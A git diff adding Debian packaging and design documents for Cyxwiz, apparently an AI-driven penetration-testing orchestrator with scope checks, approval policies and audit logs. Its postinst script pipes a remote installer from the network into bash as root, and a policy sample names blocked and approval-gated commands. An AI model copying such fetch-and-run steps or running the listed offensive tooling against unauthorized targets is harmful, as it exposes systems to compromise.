"sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ=="], - - "babel-plugin-module-resolver/glob/path-scurry/minipass": ["minipass@7.1.2", "", {}, "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw=="], - "esbuild-plugin-copy/chokidar/readdirp/picomatch": ["picomatch@2.3.1", "", {}, "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA=="], - "js-beautify/glob/path-scurry/lru-cache": ["lru-cache@10.4.3", "", {}, "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ=="], - "opencontrol/@modelcontextprotocol/sdk/express/accepts": ["accepts@2.0.0", "", { "dependencies": { "mime-types": "^3.0.0", "negotiator": "^1.0.0" } }, "sha512-5cvg6CtKwfgdmVqY1WIiXKc3Q1bkRqGLi+2W/6ao+6Y7gu/RCwRuAhGEzh5B4KlszSuTLgZYuqFqo5bImjNKng=="], "opencontrol/@modelcontextprotocol/sdk/express/body-parser": ["body-parser@2.2.0", "", { "dependencies": { "bytes": "^3.1.2", "content-type": "^1.0.5", "debug": "^4.4.0", "http-errors": "^2.0.0", "iconv-lite": "^0.6.3", "on-finished": "^2.4.1", "qs": "^6.14.0", "raw-body": "^3.0.0", "type-is": "^2.0.0" } }, "sha512-02qvAaxv8tp7fBa/mw1ga98OGm+eCbqzJOKoRt70sLmfEEi+jyBYVTDGfCL/k06/4EMk/z01gCe7HoCH/f2LTg=="], @@ -5183,12 +5173,12 @@ "pkg-up/find-up/locate-path/path-exists": ["path-exists@3.0.0", "", {}, "sha512-bpC7GYwiDYQ4wYLe+FA8lhRjhQCMcQGuSgGGqDkg/QerRWw9CmGRT0iSOVRSZJ29NMLZgIzqaljJ63oaL4NIJQ=="], - "rimraf/glob/path-scurry/lru-cache": ["lru-cache@10.4.3", "", {}, "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ=="], - "tw-to-css/tailwindcss/chokidar/glob-parent": ["glob-parent@5.1.2", "", { "dependencies": { "is-glob": "^4.0.1" } }, "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow=="], "tw-to-css/tailwindcss/chokidar/readdirp": ["readdirp@3.6.0", "", { "dependencies": { "picomatch": "^2.2.1" } }, "sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA=="], + "vite-plugin-icons-spritesheet/glob/path-scurry/lru-cache": ["lru-cache@11.2.2", "", {}, "sha512-F9ODfyqML2coTIsQpSkRHnLSZMtkU8Q+mSfcaIyKwy58u+8k5nvAYeiNhsyMARvzNcXJ9QfWVrcPsC9e9rAxtg=="], + "vitest/vite/esbuild/@esbuild/aix-ppc64": ["@esbuild/aix-ppc64@0.25.12", "", { "os": "aix", "cpu": "ppc64" }, "sha512-Hhmwd6CInZ3dwpuGTF8fJG6yoWmsToE+vYgD4nytZVxcu1ulHpUQRAB1UJ8+N1Am3Mz4+xOByoQoSZf4D+CpkA=="], "vitest/vite/esbuild/@esbuild/android-arm": ["@esbuild/android-arm@0.25.12", "", { "os": "android", "cpu": "arm" }, "sha512-VJ+sKvNA/GE7Ccacc9Cha7bpS8nyzVv0jdVgwNDaR4gDMC/2TTRc33Ip8qrNYUcpkOHUT5OZ0bUcNNVZQ9RLlg=="], diff --git a/debian/changelog b/debian/changelog new file mode 100644 index 00000000000..519ea325feb --- /dev/null +++ b/debian/changelog @@ -0,0 +1,19 @@ +cyxwiz (1.1.0-1) unstable; urgency=medium + + * Initial release + * AI-powered security operations platform + * Natural language tool orchestration + * Governance engine with policy-based approval + * Scope enforcement for authorized targets + * Comprehensive audit logging + * Structured findings management + * Professional report generation + * Integrated security tools: + - Network scanning (nmap, masscan) + - Web scanning (nikto, nuclei, gobuster, ffuf) + - Active Directory enumeration + - SMB/SNMP/DNS/LDAP testing + - API security testing + - Credential testing + + -- code3hr Sat, 17 Jan 2026 12:00:00 +0000 diff --git a/debian/compat b/debian/compat new file mode 100644 index 00000000000..b1bd38b62a0 --- /dev/null +++ b/debian/compat @@ -0,0 +1 @@ +13 diff --git a/debian/control b/debian/control new file mode 100644 index 00000000000..77f572ddd2a --- /dev/null +++ b/debian/control @@ -0,0 +1,61 @@ +Source: cyxwiz +Section: utils +Priority: optional +Maintainer: code3hr +Build-Depends: debhelper-compat (= 13) +Standards-Version: 4.6.0 +Homepage: https://github.com/code3hr/opencode +Vcs-Browser: https://github.com/code3hr/opencode +Vcs-Git: https://github.com/code3hr/opencode.git +Rules-Requires-Root: no + +Package: cyxwiz +Architecture: all +Depends: ${misc:Depends} +Pre-Depends: curl +Recommends: nmap, + nikto, + nuclei, + gobuster, + ffuf, + sqlmap, + smbclient, + ldap-utils, + snmp, + dnsutils, + sslscan, + whatweb, + wfuzz, + hydra, + medusa, + enum4linux, + nbtscan, + onesixtyone, + masscan, + amass, + subfinder +Suggests: metasploit-framework, + burpsuite, + zaproxy +Description: AI-powered security operations platform + Cyxwiz is an AI-powered operations platform for security professionals. + It orchestrates 30+ security tools through natural language commands, + with governance, scope enforcement, and audit logging. + . + Built for Kali Linux and Parrot OS, Cyxwiz leverages the 600+ security + tools already installed on these distributions. + . + Features: + - Natural language tool orchestration + - Governance engine with policy-based approval + - Scope enforcement for authorized targets only + - Comprehensive audit logging + - Structured findings management + - Professional report generation + . + Supported tool categories: + - Reconnaissance: nmap, masscan, amass, subfinder + - Web Scanning: nikto, nuclei, gobuster, ffuf, sqlmap + - Network Analysis: SMB, SNMP, DNS, LDAP enumeration + - Active Directory: User/group enumeration, Kerberoasting + - API Security: OpenAPI parsing, JWT analysis diff --git a/debian/copyright b/debian/copyright new file mode 100644 index 00000000000..84ebaee5a78 --- /dev/null +++ b/debian/copyright @@ -0,0 +1,31 @@ +Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ +Upstream-Name: cyxwiz +Upstream-Contact: code3hr +Source: https://github.com/code3hr/opencode + +Files: * +Copyright: 2024-2026 code3hr +License: MIT + +Files: debian/* +Copyright: 2026 code3hr +License: MIT + +License: MIT + Permission is hereby granted, free of charge, to any person obtaining a + copy of this software and associated documentation files (the "Software"), + to deal in the Software without restriction, including without limitation + the rights to use, copy, modify, merge, publish, distribute, sublicense, + and/or sell copies of the Software, and to permit persons to whom the + Software is furnished to do so, subject to the following conditions: + . + The above copyright notice and this permission notice shall be included + in all copies or substantial portions of the Software. + . + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS + OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. + IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY + CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, + TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE + SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/debian/cyxwiz.1 b/debian/cyxwiz.1 new file mode 100644 index 00000000000..dcf91b8bcda --- /dev/null +++ b/debian/cyxwiz.1 @@ -0,0 +1,123 @@ +.TH CYXWIZ 1 "January 2026" "cyxwiz 1.0.0" "User Commands" +.SH NAME +cyxwiz \- AI-powered security operations platform +.SH SYNOPSIS +.B cyxwiz +[\fIOPTIONS\fR] +.SH DESCRIPTION +.B Cyxwiz +is an AI-powered operations platform for security professionals. +It orchestrates 30+ security tools through natural language commands, +with governance, scope enforcement, and comprehensive audit logging. +.PP +Built for Kali Linux and Parrot OS, Cyxwiz leverages the security tools +already installed on these distributions. Instead of memorizing tool +syntax and manually orchestrating workflows, describe what you want +to accomplish in natural language. +.SH FEATURES +.TP +.B Natural Language Interface +Describe security testing tasks in plain English. Cyxwiz translates your +intent into the appropriate tool commands. +.TP +.B Governance Engine +Every action is evaluated against policies before execution. Define +what's allowed, what needs approval, and what's blocked. +.TP +.B Scope Enforcement +Define authorized targets (IPs, domains, ports). Cyxwiz prevents +accidental out-of-scope scanning. +.TP +.B Audit Trail +Every command, approval, and result is automatically logged for +compliance reporting. +.TP +.B Findings Management +Structured storage of all security findings with severity classification, +OWASP/CVE categorization, and remediation tracking. +.TP +.B Report Generation +Professional reports in Markdown, HTML, and JSON formats. +.SH SUPPORTED TOOLS +.SS Reconnaissance +nmap, masscan, amass, subfinder +.SS Web Scanning +nikto, nuclei, gobuster, ffuf, sqlmap, whatweb, wfuzz +.SS Network Analysis +SMB enumeration, SNMP walking, DNS zone transfers, LDAP enumeration +.SS Active Directory +User/group enumeration, Kerberoasting, AS-REP roasting +.SS API Security +OpenAPI parsing, JWT analysis, BOLA/IDOR testing +.SH EXAMPLES +.PP +Start Cyxwiz: +.RS +.B cyxwiz +.RE +.PP +Scan a network for open ports: +.RS +> scan 192.168.1.0/24 for open ports +.RE +.PP +Check for web vulnerabilities: +.RS +> scan https://target.com for OWASP Top 10 +.RE +.PP +Enumerate Active Directory: +.RS +> enumerate users in corp.local domain +.RE +.PP +Generate a report: +.RS +> generate executive report +.RE +.SH ENVIRONMENT +.TP +.B ANTHROPIC_API_KEY +API key for Claude AI (recommended). +.TP +.B OPENAI_API_KEY +API key for OpenAI GPT models (alternative). +.TP +.B CYXWIZ_CONFIG +Path to configuration file (optional). +.SH FILES +.TP +.I /usr/lib/cyxwiz/ +Cyxwiz installation directory. +.TP +.I /usr/share/doc/cyxwiz/ +Documentation files. +.TP +.I ~/.cyxwiz/ +User configuration and session data. +.SH SECURITY +.PP +Cyxwiz includes governance features specifically to prevent misuse: +.IP \(bu 2 +Scope enforcement blocks unauthorized targets +.IP \(bu 2 +Audit logging creates accountability +.IP \(bu 2 +Designed for authorized testing only +.PP +.B WARNING: +Only use Cyxwiz for authorized security testing. Unauthorized scanning +or testing is illegal and unethical. +.SH SEE ALSO +.BR nmap (1), +.BR nikto (1), +.BR sqlmap (1), +.BR nuclei (1) +.SH BUGS +Report bugs at: https://github.com/code3hr/opencode/issues +.SH AUTHOR +Written by code3hr. +.SH COPYRIGHT +Copyright \(co 2024-2026 code3hr. +.br +License: MIT diff --git a/debian/install b/debian/install new file mode 100644 index 00000000000..b08109c11c9 --- /dev/null +++ b/debian/install @@ -0,0 +1,4 @@ +packages/* usr/lib/cyxwiz/packages +docs/* usr/lib/cyxwiz/docs +package.json usr/lib/cyxwiz +README.md usr/share/doc/cyxwiz diff --git a/debian/postinst b/debian/postinst new file mode 100755 index 00000000000..a0fff82851b --- /dev/null +++ b/debian/postinst @@ -0,0 +1,76 @@ +#!/bin/bash +set -e + +case "$1" in + configure) + # Check if Bun is installed + if ! command -v bun &> /dev/null; then + echo "Installing Bun JavaScript runtime..." + curl -fsSL https://bun.sh/install | bash + + # Add bun to system PATH + if [ -f /root/.bun/bin/bun ]; then + ln -sf /root/.bun/bin/bun /usr/local/bin/bun + elif [ -f "$HOME/.bun/bin/bun" ]; then + ln -sf "$HOME/.bun/bin/bun" /usr/local/bin/bun + fi + fi + + # Install dependencies + echo "Installing Cyxwiz dependencies..." + cd /usr/lib/cyxwiz + bun install --production 2>/dev/null || true + + # Create cyxwiz executable wrapper + cat > /usr/bin/cyxwiz << 'WRAPPER' +#!/bin/bash +# Cyxwiz - AI-Powered Security Operations Platform + +CYXWIZ_HOME="/usr/lib/cyxwiz" + +# Ensure bun is in PATH +if [ -f "$HOME/.bun/bin/bun" ]; then + export PATH="$HOME/.bun/bin:$PATH" +elif [ -f "/root/.bun/bin/bun" ]; then + export PATH="/root/.bun/bin:$PATH" +fi + +# Check if bun is available +if ! command -v bun &> /dev/null; then + echo "Error: Bun runtime not found. Please install with:" + echo " curl -fsSL https://bun.sh/install | bash" + exit 1 +fi + +# Run Cyxwiz +exec bun run --cwd "$CYXWIZ_HOME/packages/opencode" src/index.ts "$@" +WRAPPER + + chmod +x /usr/bin/cyxwiz + + echo "" + echo "==============================================" + echo " Cyxwiz installed successfully!" + echo "==============================================" + echo "" + echo " Usage: cyxwiz" + echo "" + echo " Set your API key:" + echo " export ANTHROPIC_API_KEY=sk-ant-..." + echo " # or" + echo " export OPENAI_API_KEY=sk-..." + echo "" + echo " Documentation: /usr/share/doc/cyxwiz/" + echo "==============================================" + ;; + + abort-upgrade|abort-remove|abort-deconfigure) + ;; + + *) + echo "postinst called with unknown argument \`$1'" >&2 + exit 1 + ;; +esac + +exit 0 diff --git a/debian/postrm b/debian/postrm new file mode 100755 index 00000000000..dcf3ab25419 --- /dev/null +++ b/debian/postrm @@ -0,0 +1,21 @@ +#!/bin/bash +set -e + +case "$1" in + purge) + # Remove configuration and data + rm -rf /usr/lib/cyxwiz + rm -rf /var/lib/cyxwiz + rm -rf /var/log/cyxwiz + ;; + + remove|upgrade|failed-upgrade|abort-install|abort-upgrade|disappear) + ;; + + *) + echo "postrm called with unknown argument \`$1'" >&2 + exit 1 + ;; +esac + +exit 0 diff --git a/debian/prerm b/debian/prerm new file mode 100755 index 00000000000..eda48fa3179 --- /dev/null +++ b/debian/prerm @@ -0,0 +1,19 @@ +#!/bin/bash +set -e + +case "$1" in + remove|upgrade|deconfigure) + # Remove cyxwiz executable + rm -f /usr/bin/cyxwiz + ;; + + failed-upgrade) + ;; + + *) + echo "prerm called with unknown argument \`$1'" >&2 + exit 1 + ;; +esac + +exit 0 diff --git a/debian/rules b/debian/rules new file mode 100755 index 00000000000..ef52fce8be8 --- /dev/null +++ b/debian/rules @@ -0,0 +1,39 @@ +#!/usr/bin/make -f + +export DH_VERBOSE = 1 + +%: + dh $@ + +override_dh_auto_clean: + rm -rf node_modules + rm -rf packages/opencode/node_modules + rm -rf packages/opencode/dist + +override_dh_auto_build: + # Bun is installed via postinst if not present + @echo "Build will be performed during package installation" + +override_dh_auto_install: + # Create directory structure + mkdir -p debian/cyxwiz/usr/lib/cyxwiz + mkdir -p debian/cyxwiz/usr/bin + mkdir -p debian/cyxwiz/usr/share/doc/cyxwiz + mkdir -p debian/cyxwiz/usr/share/man/man1 + + # Copy source files + cp -r packages debian/cyxwiz/usr/lib/cyxwiz/ + cp -r docs debian/cyxwiz/usr/lib/cyxwiz/ + cp package.json debian/cyxwiz/usr/lib/cyxwiz/ + cp bun.lock debian/cyxwiz/usr/lib/cyxwiz/ 2>/dev/null || true + cp tsconfig.json debian/cyxwiz/usr/lib/cyxwiz/ 2>/dev/null || true + + # Copy documentation + cp README.md debian/cyxwiz/usr/share/doc/cyxwiz/ + cp LICENSE debian/cyxwiz/usr/share/doc/cyxwiz/ 2>/dev/null || true + + # Install man page + cp debian/cyxwiz.1 debian/cyxwiz/usr/share/man/man1/ + +override_dh_auto_test: + @echo "Skipping tests during package build" diff --git a/debian/source/format b/debian/source/format new file mode 100644 index 00000000000..89ae9db8f88 --- /dev/null +++ b/debian/source/format @@ -0,0 +1 @@ +3.0 (native) diff --git a/docs/CLAUDE.md b/docs/CLAUDE.md new file mode 100644 index 00000000000..8ee87449b12 --- /dev/null +++ b/docs/CLAUDE.md @@ -0,0 +1,346 @@ +# CLAUDE.md - Cyxwiz Project Context + +> This file contains essential context for AI assistants working on the Cyxwiz project. + +--- + +## What is Cyxwiz? + +Cyxwiz is a **multi-domain AI operations platform** for professionals who use command-line tools. It's being built by forking [OpenCode](https://github.com/anomalyco/opencode) (MIT licensed). + +**One-liner:** Speak intent, tools execute with governance, AI explains results - all auditable. + +--- + +## Core Concept + +Cyxwiz is NOT just another AI coding assistant. It's a **governed orchestration layer** for domain-specific tools. + +``` +Human Intent → LLM Translation → Governance Check → Tool Execution → Parsed Results → LLM Explanation +``` + +**Key differentiator:** Governance engine that enforces scope, requires approvals for dangerous commands, and creates audit trails. + +--- + +## Strategic Decisions Made + +| Decision | Choice | Rationale | +|----------|--------|-----------| +| Build vs Fork | Fork OpenCode | Get CLI/TUI/multi-LLM for free | +| Plugin vs Platform | Platform (own fork) | Full control, can grow unlimited | +| Language | TypeScript | Inherited from OpenCode | +| First domain | Pentest | Clear user (security consultants), clear tools | +| Target OS | Kali/Parrot Linux | 600+ tools pre-installed, zero friction | + +--- + +## Architecture Overview + +``` +┌─────────────────────────────────────────────────────────┐ +│ CYXWIZ PLATFORM │ +├─────────────────────────────────────────────────────────┤ +│ INHERITED (OpenCode): │ +│ CLI/TUI │ Multi-LLM │ Sessions │ Tool Exec │ Plugins │ +├─────────────────────────────────────────────────────────┤ +│ CYXWIZ CORE (we build): │ +│ Governance │ Scope Enforce │ Audit │ Findings │ Reports│ +├─────────────────────────────────────────────────────────┤ +│ DOMAIN AGENTS: │ +│ Pentest (MVP) │ SOC │ DevOps │ NetEng │ Community │ +└─────────────────────────────────────────────────────────┘ +``` + +--- + +## Tech Stack + +- **Language:** TypeScript (inherited from OpenCode) +- **Runtime:** Bun +- **State:** SQLite +- **LLM:** Multi-provider (Claude, GPT, Gemini, etc.) +- **Plugin System:** OpenCode plugins (extended) + +--- + +## Governance Engine (Core Feature) + +This is what makes Cyxwiz different from vanilla OpenCode or ChatGPT. + +**Before any command executes:** +1. **Scope Check** - Is target in allowed scope? +2. **Policy Check** - Is command auto-approved, needs approval, or blocked? +3. **Approval Flow** - Auto-execute or prompt user +4. **Audit Log** - Record everything regardless of outcome + +**Policy example:** +```typescript +{ + domain: "pentest", + autoApprove: ["nmap *", "nikto *", "ffuf *"], + requireApproval: ["metasploit *", "sqlmap --os-*"], + blocked: ["rm -rf *"] +} +``` + +--- + +## Target Users + +### MVP: Solo Security Consultant +- Does pentests, web app assessments +- Uses 5-15 tools per engagement +- Needs audit trail for reports +- Time = money + +### Future Domains: +- **SOC Analyst** - SIEM queries, threat intel, IOC checking +- **DevOps Engineer** - kubectl, terraform, ansible, cloud CLIs +- **Network Engineer** - Cisco/Juniper CLI, network scanners + +--- + +## Build Phases + +1. **Fork & Foundation** - Fork OpenCode, understand codebase +2. **Governance Engine** - Implement scope/policy/audit as core +3. **Pentest Agent MVP** - nmap + governance + findings +4. **Multi-Tool Pentest** - nikto, ffuf, nuclei, full workflow +5. **State & Reports** - Session persistence, exports +6. **Platform Polish** - Distribution, docs, community +7. **Multi-Domain** - SOC, DevOps, NetEng agents + +--- + +## Key Files + +- `docs/PROJECT.md` - Full project specification and roadmap +- `docs/CLAUDE.md` - This file (AI context) +- `docs/USAGE.md` - Development guide + +--- + +## Distribution Strategy + +**Primary target:** Kali Linux / Parrot OS + +These distros have 600+ security tools pre-installed. Cyxwiz becomes the intelligent orchestration layer: + +```bash +# On Kali, all tools ready +cyxwiz setup +> 47 tools detected. Cyxwiz is ready. + +cyxwiz pentest start --scope 10.0.0.0/24 +> scan for open ports +[APPROVED] Executing nmap... +``` + +**Goal:** Get Cyxwiz pre-installed in Kali/Parrot eventually. + +--- + +## What Cyxwiz Is NOT + +- Not building security tools (orchestrates existing ones) +- Not autonomous (human-in-the-loop always) +- Not a general AI assistant (domain-specific) +- Not a plugin on someone else's platform (we own it) + +--- + +## Code Style & Principles + +When contributing to Cyxwiz: + +1. **Governance is core** - Never bypass scope/policy checks +2. **Audit everything** - Every command attempt gets logged +3. **Parsers over LLM** - Use structured parsers for tool output, not LLM +4. **Human decides** - LLM suggests, human approves dangerous actions +5. **Domain-specific** - Each agent deeply understands its tools + +--- + +## Common Commands (When Built) + +```bash +# Start pentest engagement +cyxwiz pentest start --scope 10.0.0.0/24 --exclude 10.0.0.1 + +# Natural language interaction +> scan for open ports +> check web services for vulnerabilities +> generate report + +# View findings +cyxwiz findings list +cyxwiz findings export --format markdown + +# Check audit log +cyxwiz audit show +``` + +--- + +## OpenCode References + +Since Cyxwiz forks OpenCode, understand these: + +- [OpenCode GitHub](https://github.com/anomalyco/opencode) +- [OpenCode Docs](https://opencode.ai/docs/) +- [Agents](https://opencode.ai/docs/agents/) +- [Plugins](https://opencode.ai/docs/plugins/) +- [Custom Tools](https://opencode.ai/docs/custom-tools/) + +Key OpenCode concepts: +- **Agents** - Specialized AI assistants (we add domain agents) +- **Plugins** - Hook system with `tool.execute.before/after` +- **Tools** - TypeScript functions LLM can invoke +- **MCP** - Model Context Protocol for external integrations + +--- + +## Current Status + +**Phase:** Phase 16 Complete - Post-Exploitation Framework + +**Completed Phases:** + +| Phase | Module | Status | +|-------|--------|--------| +| 1-5 | Core Pentest Module | ✅ Complete | +| 6 | Parser Extensions (nikto, nuclei, gobuster, ffuf, sslscan) | ✅ Complete | +| 7 | Report Generation | ✅ Complete | +| 8 | Continuous Monitoring | ✅ Complete | +| 8b | Exploit Integration | ✅ Complete | +| 8c | Web Scanner | ✅ Complete | +| 9 | API Security Scanner | ✅ Complete | +| 10 | Network Infrastructure Scanner (AD, SMB, DNS, SNMP, LDAP) | ✅ Complete | +| 11 | Cloud Security Scanner (AWS, Azure, GCP) | ✅ Complete | +| 12 | Container Security Scanner + CVE Lookup | ✅ Complete | +| 13 | Mobile Application Scanner (Android/iOS) | ✅ Complete | +| 14 | Wireless Network Scanner (WiFi, Bluetooth, RFID) | ✅ Complete | +| 15 | Social Engineering Toolkit | ✅ Complete | +| 16 | Post-Exploitation Framework | ✅ Complete | + +**Pending Phases:** +- Phase 17: Reporting Dashboard (web-based interface) +- Phase 18: CI/CD Security Integration + +**Pentest Tools Available:** +- `nmap` - Network scanning with XML parsing +- `sectools` - 30+ security tool wrappers +- `report` - Security assessment reports (MD, HTML, JSON) +- `monitor` - Scheduled scans with diff detection +- `exploit` - Exploit matching and execution +- `webscan` - Web application security scanner +- `apiscan` - API security testing (OpenAPI, GraphQL) +- `netscan` - Network infrastructure (AD, SMB, DNS, SNMP, LDAP) +- `cloudscan` - Cloud security (AWS, Azure, GCP, compliance) +- `cve` - CVE lookup (NVD, OSV, CISA KEV) +- `containerscan` - Container/K8s security (Trivy, Grype) +- `mobilescan` - Mobile app security (Android APK, iOS IPA) +- `wirelessscan` - Wireless security (WiFi, Bluetooth, RFID/NFC) +- `soceng` - Social engineering toolkit +- `postexploit` - Post-exploitation framework + +**How to run (dev mode):** +```bash +export PATH="$HOME/.bun/bin:$PATH" +cd /home/mrcj/Desktop/wiz +bun run --cwd packages/opencode src/index.ts +``` + +--- + +## Codebase Structure (Key Findings) + +``` +/home/mrcj/Desktop/wiz/ +├── README.md # Cyxwiz README +├── docs/ +│ ├── PROJECT.md # Full specification +│ ├── CLAUDE.md # This file +│ ├── TODO.md # Development phases +│ ├── PHASE3-16.md # Phase documentation +│ └── PENTEST.md # Pentest module guide +├── packages/ +│ ├── opencode/src/ # Core CLI/TUI +│ │ ├── tool/ # Tool definitions +│ │ │ ├── tool.ts # Base tool definition +│ │ │ ├── bash.ts # Bash execution +│ │ │ ├── registry.ts # Tool registry (includes all pentest tools) +│ │ │ └── ... +│ │ ├── pentest/ # Pentest module (CYXWIZ CORE) +│ │ │ ├── types.ts # Core type definitions +│ │ │ ├── findings.ts # Security findings storage +│ │ │ ├── nmap-parser.ts # Nmap XML parsing +│ │ │ ├── nmap-tool.ts # Nmap tool +│ │ │ ├── sectools.ts # 30+ security tool wrappers +│ │ │ ├── parsers/ # Tool output parsers +│ │ │ ├── reports/ # Report generation +│ │ │ ├── monitoring/ # Continuous monitoring +│ │ │ ├── exploits/ # Exploit integration +│ │ │ ├── webscan/ # Web application scanner +│ │ │ ├── apiscan/ # API security scanner +│ │ │ ├── netscan/ # Network infrastructure (AD, SMB, DNS) +│ │ │ ├── cloudscan/ # Cloud security (AWS, Azure, GCP) +│ │ │ ├── cve/ # CVE lookup service +│ │ │ ├── containerscan/ # Container/K8s security +│ │ │ ├── mobilescan/ # Mobile app security +│ │ │ ├── wirelessscan/ # Wireless security +│ │ │ ├── soceng/ # Social engineering toolkit +│ │ │ └── postexploit/ # Post-exploitation framework +│ │ ├── plugin/ # Plugin loader +│ │ ├── permission/ # Permission system +│ │ ├── agent/ # Agent definitions +│ │ ├── session/ # Session management +│ │ └── config/ # Configuration +│ ├── plugin/ # Plugin SDK +│ │ └── src/index.ts # Hook definitions +│ └── sdk/ # Client SDK +└── [OpenCode config files] +``` + +## Governance Injection Points + +**Primary hook (packages/plugin/src/index.ts lines 176-187):** + +```typescript +"tool.execute.before"?: ( + input: { tool: string; sessionID: string; callID: string }, + output: { args: any }, +) => Promise + +"tool.execute.after"?: ( + input: { tool: string; sessionID: string; callID: string }, + output: { title: string; output: string; metadata: any }, +) => Promise +``` + +**Strategy:** +1. `tool.execute.before` → Check scope, check policy, require approval +2. `tool.execute.after` → Audit log, parse output, store findings + +--- + +## Mentor Mode + +The user has requested a "ruthless mentor" approach: +- Don't sugarcoat feedback +- Stress test all ideas before building +- Call out weak thinking directly +- Validate that we're solving real problems +- No vanity features - ship what matters + +--- + +## Questions to Ask Before Building Features + +1. Does this go through governance? (It should) +2. Is this audited? (It should be) +3. Does this serve the target user's workflow? +4. Is this the simplest solution? +5. Are we building platform or just tool? diff --git a/docs/COMPARISON.md b/docs/COMPARISON.md new file mode 100644 index 00000000000..990b00b5dfa --- /dev/null +++ b/docs/COMPARISON.md @@ -0,0 +1,264 @@ +# Cyxwiz vs Other Solutions + +How Cyxwiz compares to existing security tools and platforms, what makes it different, and what we're NOT trying to do. + +--- + +## Quick Comparison Matrix + +| Feature | Cyxwiz | Metasploit | Faraday | Cobalt Strike | Pentest GPT | Manual CLI | +|---------|-----|------------|---------|---------------|-------------|------------| +| Natural language interface | Yes | No | No | No | Yes | No | +| Tool orchestration | Yes | Partial | No | Yes | No | Manual | +| Governance/approval | Yes | No | No | No | No | No | +| Scope enforcement | Yes | No | No | No | No | No | +| Audit logging | Yes | Partial | Yes | Yes | No | Manual | +| Findings management | Yes | Partial | Yes | Yes | No | Manual | +| Report generation | Yes | Yes | Yes | Yes | No | Manual | +| Multi-tool support | 30+ | MSF only | Import | CS only | Advice only | Any | +| Open source | Yes | Yes | Yes | No | No | N/A | +| Offline capable | Yes | Yes | Yes | Yes | No | Yes | + +--- + +## Detailed Comparisons + +### vs Metasploit Framework + +**What Metasploit is:** The industry-standard exploitation framework with modules for scanning, exploitation, and post-exploitation. + +**How Cyxwiz is different:** +- Metasploit focuses on exploitation; Cyxwiz orchestrates reconnaissance through reporting +- Metasploit has its own module ecosystem; Cyxwiz leverages existing CLI tools (nmap, nikto, etc.) +- Metasploit requires learning MSF syntax; Cyxwiz uses natural language +- Cyxwiz has governance/scope enforcement; Metasploit does not + +**When to use Metasploit:** Deep exploitation, payload generation, post-exploitation +**When to use Cyxwiz:** Orchestrated assessments, compliance-focused testing, team environments + +--- + +### vs Faraday + +**What Faraday is:** Collaborative penetration testing and vulnerability management platform. + +**How Cyxwiz is different:** +- Faraday is a web-based collaboration platform; Cyxwiz is a CLI-first tool +- Faraday imports results from tools; Cyxwiz executes and orchestrates tools +- Faraday focuses on team collaboration; Cyxwiz focuses on individual productivity with AI +- Cyxwiz has natural language interface; Faraday uses traditional UI + +**When to use Faraday:** Team collaboration, vulnerability tracking, client reporting +**When to use Cyxwiz:** Solo assessments, rapid testing, learning, AI-assisted analysis + +--- + +### vs Cobalt Strike + +**What Cobalt Strike is:** Commercial adversary simulation and red team operations platform. + +**How Cyxwiz is different:** +- Cobalt Strike is for red team operations; Cyxwiz is for penetration testing +- Cobalt Strike focuses on stealth and persistence; Cyxwiz focuses on assessment +- Cobalt Strike is commercial ($5,900/year); Cyxwiz is open source (free) +- Cyxwiz has scope enforcement to prevent accidents; Cobalt Strike assumes operator expertise + +**When to use Cobalt Strike:** Red team engagements, adversary emulation, APT simulation +**When to use Cyxwiz:** Penetration testing, security assessments, compliance testing + +--- + +### vs PentestGPT / AI Chatbots + +**What PentestGPT is:** ChatGPT-based assistant that provides penetration testing guidance. + +**How Cyxwiz is different:** +- PentestGPT gives advice; Cyxwiz executes tools +- PentestGPT runs in browser; Cyxwiz runs locally on your machine +- PentestGPT can't see your environment; Cyxwiz operates within it +- Cyxwiz has governance and audit; PentestGPT is just a conversation +- Cyxwiz works offline with local LLMs; PentestGPT requires internet + +**When to use PentestGPT:** Learning, brainstorming, methodology questions +**When to use Cyxwiz:** Actual testing, tool execution, documented assessments + +--- + +### vs Manual CLI Usage + +**What manual CLI is:** Running nmap, nikto, sqlmap, etc. directly in terminal. + +**How Cyxwiz is different:** +- Manual requires memorizing syntax; Cyxwiz uses natural language +- Manual requires copy/paste between tools; Cyxwiz orchestrates automatically +- Manual has no built-in audit trail; Cyxwiz logs everything +- Manual has no scope enforcement; Cyxwiz prevents out-of-scope testing +- Manual findings are scattered; Cyxwiz centralizes and structures them + +**When to use manual CLI:** Quick one-off commands, custom scripts, learning tools +**When to use Cyxwiz:** Full assessments, compliance work, repeatable testing + +--- + +### vs Automation Frameworks (Ansible/Python Scripts) + +**What automation frameworks are:** Custom scripts or playbooks that automate security testing. + +**How Cyxwiz is different:** +- Automation requires writing code; Cyxwiz uses natural language +- Automation is rigid (follows scripts); Cyxwiz adapts via AI +- Automation requires maintenance; Cyxwiz leverages existing tools +- Cyxwiz provides governance layer; scripts run without guardrails + +**When to use automation:** Highly repeatable tasks, CI/CD integration, custom workflows +**When to use Cyxwiz:** Ad-hoc testing, varied engagements, 